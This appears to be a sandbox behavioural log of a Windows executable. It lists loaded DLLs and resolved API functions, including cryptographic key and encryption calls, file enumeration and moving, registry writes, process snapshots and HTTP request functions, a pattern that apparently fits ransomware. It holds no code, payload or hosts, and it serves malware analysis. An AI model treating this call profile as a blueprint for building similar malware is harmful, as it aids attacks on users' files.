Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x7768a0f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x7768a790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x77689680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x776b28e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x7768a2c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x77696020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7768fbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsAlloc, address_out = 0x77689a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsGetValue, address_out = 0x77681ba0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsSetValue, address_out = 0x77681da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TlsFree, address_out = 0x77689930 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x77689660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77c85e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77c85e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x776825e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidCodePage, address_out = 0x7768a090 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetACP, address_out = 0x77688770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetOEMCP, address_out = 0x7768fd10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCPInfo, address_out = 0x77689fc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryExW, address_out = 0x77687920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OutputDebugStringW, address_out = 0x776b1c30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c7da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77c7bae0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetStringTypeW, address_out = 0x776879b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapSize, address_out = 0x77c94f40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringW, address_out = 0x77689a40 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetFocus, address_out = 0x74da5240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74d838f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x74da3140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x74da50f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x74d855d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74da3230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74d8b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74d83e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetForegroundWindow, address_out = 0x74d8df70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77cbcaa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74d88ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74d891c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74da56f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74da52a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = keybd_event, address_out = 0x74defcf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74d97020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowTextW, address_out = 0x74d94580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongW, address_out = 0x74d84e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x74d81830 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x74d8bea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetAncestor, address_out = 0x74da5840 True 1
Fn
Module Load module_name = ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlUnwind, address_out = 0x77c9aca0 True 1
Fn
Module Load module_name = msvcr100.dll, base_address = 0x74ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\msvcr100.dll, function = atexit, address_out = 0x74afc544 True 1
Fn
System Get Time type = System Time, time = 2018-05-22 08:11:48 (UTC) True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x7768a330 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x7768f400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x77687580 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x77689910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x77696030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x77695f90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x77695ff0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadStackGuarantee, address_out = 0x7768a5d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x7768a690 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77c740f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77c6d630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77c6ecf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x77695720 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77c6e140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77c6eb60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77ca9990 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77ca5540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c99dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalProcessorInformation, address_out = 0x7768a550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x776b0a40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetDefaultDllDirectories, address_out = 0x76aa0790 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumSystemLocalesEx, address_out = 0x7768f8a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x7768fa30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDateFormatEx, address_out = 0x776b1030 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x7768a000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeFormatEx, address_out = 0x776b14b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultLocaleName, address_out = 0x7768a4f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsValidLocaleName, address_out = 0x776b16f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x77689970 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x76a23c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x77688710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\2018-05-22_13-47-32.exe, size = 256 True 2
Fn
System Sleep duration = 200 milliseconds (0.200 seconds) True 1
Fn
Module Get Handle module_name = c:\users\ciihmnxmn6ps\desktop\2018-05-22_13-47-32.exe, base_address = 0x400000 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = IsMenu, address_out = 0x74d902a0 True 1
Fn
Window Set Attribute index = 0, new_long = 825373492 False 1
Fn
Window Create class_name = ExtraWnd1, wndproc_parameter = 0 True 1
Fn
Window Create class_name = ExtraWnd2, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 6
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x77670000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x776877b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x7768fbc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerifyVersionInfoW, address_out = 0x77687960 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x776960f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77c99920 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x776887c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x7768c8c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x7768a510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetHandleInformation, address_out = 0x77695f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatA, address_out = 0x7768efc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77682d60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreatePipe, address_out = 0x77680570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x7768ee30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x7768c9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x77697510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77c85e00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x77695f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x77696250 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x77696340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpW, address_out = 0x776878d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MoveFileW, address_out = 0x7768a770 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x776961d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x77696290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x77696510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x7768a410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x77693e90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x7768fcb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetWindowsDirectoryW, address_out = 0x77694cc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x77696450 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x7768d8d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemDirectoryW, address_out = 0x77689a90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x776892b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77c995f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x77696110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VerSetConditionMask, address_out = 0x77c953c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x77696300 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcatW, address_out = 0x776ad320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x77689680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x77687540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileMappingW, address_out = 0x776891e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenW, address_out = 0x77682d80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitThread, address_out = 0x77ca2570 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x77696180 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x77689560 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x77696590 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x77689660 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x776894b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MapViewOfFile, address_out = 0x77688c10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x77696360 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x77689540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyA, address_out = 0x7768e320 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x77689640 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x77688b70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x77687940 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x77687910 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x776825e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x77695fe0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcpyW, address_out = 0x776ad410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x77682db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointerEx, address_out = 0x77696540 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalAlloc, address_out = 0x77688840 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalFree, address_out = 0x77693a70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x77696420 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MulDiv, address_out = 0x77695db0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalAlloc, address_out = 0x77689600 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x776957f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x776964a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x77687610 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x77688c70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceW, address_out = 0x776962e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x77689700 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x77682da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77c7da90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrlenA, address_out = 0x77693a30 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77c85e80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x776974f0 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x74d70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextW, address_out = 0x74d92f20 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawTextA, address_out = 0x74d920f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDC, address_out = 0x74c6a340 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ReleaseDC, address_out = 0x74c6a240 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EndPaint, address_out = 0x74da4ec0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x74c72220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMessageW, address_out = 0x74da3230 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadCursorW, address_out = 0x74d87740 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = BeginPaint, address_out = 0x74da4ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = FillRect, address_out = 0x74d92bb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x74d8b9d0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x74d88ee0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongW, address_out = 0x74c72130 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MessageBoxA, address_out = 0x74decf50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfA, address_out = 0x74d9ea00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SystemParametersInfoW, address_out = 0x74d8bea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = ShowWindow, address_out = 0x74da52a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x74d891c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SendMessageW, address_out = 0x74d838f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x74d83e40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x74c71160 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UpdateWindow, address_out = 0x74d97020 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetForegroundWindow, address_out = 0x74da50f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperBuffW, address_out = 0x74da3140 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = wsprintfW, address_out = 0x74d9ddf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadIconW, address_out = 0x74d87710 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76ca0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76d20050 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76d1fc80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x74c717b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x74c71750 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetPixel, address_out = 0x76d51710 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetObjectW, address_out = 0x76d22220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetPixel, address_out = 0x76d4fdf0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetStockObject, address_out = 0x76d225e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = TextOutW, address_out = 0x76d4a630 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetBkColor, address_out = 0x76d21da0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDIBits, address_out = 0x76d20dc0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x74c71080 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x76d20550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateFontW, address_out = 0x76d4deb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SetTextColor, address_out = 0x76d21c80 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x779af550 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x779aefa0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x779af0a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x779aee90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x779b0ea0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x779b0f50 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x779aed40 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptExportKey, address_out = 0x779af8f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x779b0730 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGetKeyParam, address_out = 0x779c5c90 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x779b0ad0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x779af890 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x779c5bd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenKey, address_out = 0x779b3fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x779afc10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x779aed60 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x779aed80 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x779af0c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x779b04a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetUserNameW, address_out = 0x779b0ee0 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x755b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetSpecialFolderPathW, address_out = 0x7573edb0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x75744370 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x75744cb0 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x74eb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptBinaryToStringA, address_out = 0x74ed2290 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptStringToBinaryA, address_out = 0x74ef8040 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x748b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x74932410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpAddRequestHeadersW, address_out = 0x7497f750 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpSendRequestW, address_out = 0x74924510 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectW, address_out = 0x7494b650 True 1
Fn
